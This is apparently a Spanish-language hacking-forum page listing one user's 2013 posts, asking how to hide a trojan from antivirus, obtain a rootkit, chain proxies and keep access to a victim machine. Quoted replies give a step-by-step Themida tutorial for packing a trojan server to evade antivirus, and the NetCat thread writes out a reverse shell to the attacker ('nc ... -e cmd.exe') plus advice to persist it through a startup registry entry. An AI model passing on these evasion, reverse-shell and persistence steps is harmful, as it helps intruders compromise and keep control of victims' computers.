Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Rocky91

Páginas 1 2 3
#21
Dudas y pedidos generales / Re:Ayuda ocultar troyano
Junio 25, 2013, 07:22:01 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ocultar? te refieres de hacerlo indetectable? revisa sobre los crypters

Regards,
Snifer

Sí, estoy poco pegado con esto.
#22
Dudas y pedidos generales / [SOLUCIONADO] Ayuda ocultar troyano
Junio 25, 2013, 07:10:24 PM
Hola a todos.

Estoy ahora con el tema de los troyanos, en una practica que tengo hacer, que se trata de ocultar el troyano frente al antivirus, ¿como podría hacerlo bien? ¿Hay algún tutorial o algo? me refiero ha hacerlo de manera "Profesional", nada de por ejemplo themida.

Saludos
#23
Dudas y pedidos generales / Re:Ayuda con RootKit
Junio 19, 2013, 01:12:57 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tengo conocimientos en programación, (no avanzados) si es algo complejo hacer una Rootkit pues lo dejare para mas adelante, me conformare con una RootKit ya hecha, por prisa para el ejercicio.

El SO que utilizo es Backtrack, ahora lo estoy comprobando con un Windows XP, 7.

Saludos

:S comprobando en un Windows 7? el rootkit pero lo necesitas para Linux? :S...

No puedes tener uno que ande en los dos ¬¬ a la primera

No perdona, estoy utilizando Backtrack CONTRA Windows7, XP.
#24
Dudas y pedidos generales / Re:Ayuda con themida
Junio 19, 2013, 05:53:37 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lo muevo a su seccion correspondiente.
Creo que lo que buscas es esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login - Esta en ingles, pero merece la pena.

-Saludos-

Gracias, me apaño con eso jiji.
#25
Dudas y pedidos generales / Re:Ayuda con RootKit
Junio 18, 2013, 02:08:31 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ok, pues no acabas diciendo sobre qué sistema operativo estás trabajando, ni que tipo de rootkit necesitas.
Con el hecho de crear una, es un tema muy complejo y que requiere amplios conocimientos de programación. Si crees que los tienes contactame por privado! Saludos!

Tengo conocimientos en programación, (no avanzados) si es algo complejo hacer una Rootkit pues lo dejare para mas adelante, me conformare con una RootKit ya hecha, por prisa para el ejercicio.

El SO que utilizo es Backtrack, ahora lo estoy comprobando con un Windows XP, 7.

Saludos
#26
Dudas y pedidos generales / Re:Ayuda con RootKit
Junio 18, 2013, 12:49:02 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas a todos.

Me gustaría saber donde encontrar una RootKit para una practica que tengo que hacer, otra cosa que me gustaría sería el echo de crear una, así subir nota. ;D

Saludos

Que entiendes por Rootkit?  ???

Conjunto de herramientas raíz, su uso es esconder, procesos, programas, claves de registros, ficheros y puertos manteniendo así el acceso al intruso.
#27
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con RootKit
Junio 18, 2013, 04:44:37 AM
Buenas a todos.

Me gustaría saber donde encontrar una RootKit para una practica que tengo que hacer, otra cosa que me gustaría sería el echo de crear una, así subir nota. ;D

Saludos
#28
Dudas y pedidos generales / Re:Problemas con proxychains
Junio 17, 2013, 07:21:01 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
hmm esta raro, la verdad nose que podria ser  ??? yo en backtrack lo use con un socks5 y me funciono bien =S, esperemos las respuestas de los demas y si de plano no logras hacerlo funcionar te recomendaria usar openvpn.

Saludos..

Bueno necesita algo que me creara una cadena de proxys.

Mira me para lo mismo que a este.

#29
Dudas y pedidos generales / Re:Problemas con proxychains
Junio 17, 2013, 06:29:02 PM
Mira
Código: text
# proxychains.conf  VER 3.1
#
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#       

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see  chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080    
#               
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
http    218.108.85.59   80


Y el error

Código: text
root@bt:~# proxychains firefox
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-request| www.offensive-security.com 
|DNS-request| www.backtrack-linux.org 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.backtrack-linux.org is not exist
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.offensive-security.com is not exist
|DNS-request| localhost 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: localhost is not exist
Usage:program_name [address][:port]|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| localhost 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: localhost is not exist
Usage:program_name [address][:port]|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| secure.informaction.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: secure.informaction.com is not exist
|DNS-request| secure.informaction.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: secure.informaction.com is not exist


El caso esque hago los mismos paso en una distro de debian y sale to bien, no se por que en backtack no.
#30
Dudas y pedidos generales / Re:Ayuca con Ncat o Cryptcat
Junio 17, 2013, 10:58:12 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para cryptcat: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para ncat: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias.
#31
Dudas y pedidos generales / Re:Problemas con proxychains
Junio 17, 2013, 08:37:11 AM
Pero si te fijas es como si namas que le hiciera caso al 127.0.0.1
Saludos
#32
Dudas y pedidos generales / Re:Problemas con proxychains
Junio 17, 2013, 04:01:29 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El problema esta en tu archivo de configuración, tienes que comentar la linea donde dice 'socks4  127.0.0.1 9050' para que quede asi:

Código: text

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4  127.0.0.1 9050
socks4  88.150.205.239  1080


Incluso comentándola me sigue saliendo el mismo error.
#33
Dudas y pedidos generales / [SOLUCIONADO] Problemas con proxychains
Junio 16, 2013, 06:22:41 PM
Hola a todos.

Bueno mi problema es que al intentar acceder al navegador a traves de una cadena de proxys no puedo, os dejo lo que e dice.

Saludos

Configuración

Código: text
# proxychains.conf  VER 3.1
#
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#       

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see  chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns
# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080    
#               
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
socks4  88.150.205.239  1080


Error que me dá

Código: text
root@bt:~# proxychains google-chrome
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-request| ::1 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: ::1 is not exist
|DNS-request| www.google.es 
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-response|: www.google.com is not exist
[10484:10514:0616/171138:ERROR:object_proxy.cc(624)] Failed to get name owner. Got org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.chromium.Mtpd': no such name
[10484:10514:0616/171138:ERROR:object_proxy.cc(624)] Failed to get name owner. Got org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.chromium.Mtpd': no such name
|DNS-request| clients4.google.com 
|DNS-request| translate.googleapis.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: clients4.google.com is not exist
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: translate.googleapis.com is not exist
[10484:10484:0616/171138:ERROR:object_proxy.cc(529)] Failed to call method: org.chromium.Mtpd.EnumerateStorages: object_path= /org/chromium/Mtpd: org.freedesktop.DBus.Error.ServiceUnknown: The name org.chromium.Mtpd was not provided by any .service files
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.com is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| tnqhmsvxza 
|DNS-request| kupsdqwpfn 
|DNS-request| omepajdrvj 
|S-chain|-<>-127.0.0.1:9050-|S-chain|-<>-127.0.0.1:9050-<--timeout
<--timeout
|DNS-response|: tnqhmsvxza is not exist
|DNS-response|: kupsdqwpfn is not exist
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: omepajdrvj is not exist
|DNS-request| ssl.gstatic.com 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: ssl.gstatic.com is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist
|DNS-request| www.google.es 
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: www.google.es is not exist

#34
Dudas y pedidos generales / [SOLUCIONADO] Ayuca con Ncat o Cryptcat
Junio 16, 2013, 04:09:07 PM
Hola a todos.

Necesitaría uno de estos dos programas si es los dos mejor, para ejecutarlo en Windows desde backtrack.

¿Sabéis algún sitio donde descargarlo?

Saludos
#35
Dudas y pedidos generales / Re:Ayuda con themida
Junio 16, 2013, 08:34:40 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Themida es un software usado por los desarrolladores de programas, para proteger sus creaciones y que así no puedan ser crackeadas, o por lo menos sea mas dificil.

-Themida protege cualquier ejecutable Encriptando su codigo.

-Themida por eso sirve para proteger troyanos, ya que los antivirus no detectan el codigo maligno por ejemplo cuando lo creas y quieres enviar el Server pero los antivirus lo detectan, y querer instalarlo en un maquina o simplemente enviarlo por correo etc.

**No me hago responsable del uso**

Abrimos el themida nos aperecera esta pantalla .



Vamos a Input Filename y buscamos el server del troyano.Output Filename es para guardarlo con otro nombre y mantener el otro normal sin encriptar,si quioeren cambiarle el nombre solo le dan en Same as input y destildan y lo guardan con otro nombre como en la imagen.Vamos a Protection Options

la dejaremos asi como en la imagen,vamos a Virtual Machine  la de Code Replace la salto por que no se toca nada




lo dejaremos como en la imagen fijense en lo que esta marcado deve de quedar asi.Customized Dialogs la salto no se toca nada de ahi.

Vamos a Advanced Options






donde esta de rojo ponemos el nombre que queramos le daremos en Protect arriba y Protect otra vez emepezará a protegerlo cuando termine tendremos esto




le damos a Close y salir no guarden nada,si le dan en test protected file se infectaran ustedes mismos este sera el resultado



** Segunda Opcion de Encriptar el Server deja el server menos pesado

Aplication Information es lo mismo que la otra.Vamos a Protection Options lo dejaremos asi




-destildamos todo menos los dos que estan en rojo xD.Code Replace nada.Vamos a Virtual Machine lo dejaremos asi




-Customize Dialogs nada vamos a Advanced Options y destildamos como en la imagen ,cambiamos el nombre que pone themida por otro cualquiera.

-este sera el resultado de esta manera de protegerlo.

Es bueno el tuto pero como he dicho busco un manual, por que lo que no quiero es hacerlo sin saber lo que estoy haciendo. Quiero algo como, esta función hace esto y sirve para esto otro.
#36
Dudas y pedidos generales / Ayuda con themida
Junio 16, 2013, 07:20:29 AM
Hola a todos.

Necesito un manual de themida no un tutorial, he estado buscando por google y nada mas que encuentro tutoriales de tipo pon esto igual que la imagen y listo, no busco eso busco un manual que te explique para que vale cada función. ¿Sabéis alguno?

Saludos
#37
Dudas y pedidos generales / Re:Duda con NetCat
Junio 12, 2013, 04:12:00 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Claro que la hay, solo es cuestión de usar bien la imaginación.
Te puedes crear un BAT que ejecute el netcat con los parámetros e incluirlo en el registro de windows para que se ejecute siempre al iniciar el sistema. Hay muchas cosas más que puedes hacer, solo piensa en ello! El único limite es la imaginación y creatividad de cada uno.
Saludos!

CrazyKade

Jeje gracias, la verdad es que es facil jiji tengo que pensar un poco mas jejeje. :P

Saludos
#38
Dudas y pedidos generales / Re:¿Que es un modulo auxiliary de metasploit?
Junio 11, 2013, 06:24:42 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
los auxiliary, básicamente sirven o ayudan a obtener informacion.
por ejemplo supongamos que estas atacando un servidor con FTP, el auxiliary podria ayudar a ver si el servidor acepta login como anonimous, o si acepta por ejemplo user=admin password=admin por decir algo.
lógicamente dependerá mucho del auxiliary , pues como ya te respondieron ay de muchos tipos  (scanning, fuzzing, sniffing,etc)
saludos y espero averme dado a entender XD

Gracias, ya me has puesto por buen camino jeje.
#39
Dudas y pedidos generales / [SOLUCIONADO] Duda con NetCat
Junio 11, 2013, 06:23:19 PM
Hola a todos.



Una vez que ya tengo dominado los escaneadores de vulnerabilidades, metasploit y haber ejecutado la puerta trasera con NetCat hata ahí bien.

Pero mi duda es, para ejecutar netcat desde la maquina victima, tienes que estar conectado por meterpreter, dese ahí ejecutar la shell, irte al directorio donde esta netcat y ejecutar nc dirección_atacante 37337 -e cmd.exe y en la maquina atacante nc -v -l -p 37337 y ya se establece la conexión, ¿y si al quieres conectarte otro dia directamente por nc, tienes otra vez que conectarte a metasploit ejecutar la shell y nc? no tiene sentido, por que en el momento que pongan el parche ya no puedes volver a lanar el exploit, tiene que aver algún modo que la maquina victima siempre quiera conectarse a nosotros. ¿Como?

Saludos
#40
Dudas y pedidos generales / Re:¿Que es un modulo auxiliary de metasploit?
Junio 11, 2013, 11:06:07 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
En el módulo auxiliary existen diversos sistemas de explotación, escaneo y descubrimiento del sistema.

CitarThe Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.

Mira esta You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Saludos.
WhiZ

Sigo igual  ??? :o :(
Páginas 1 2 3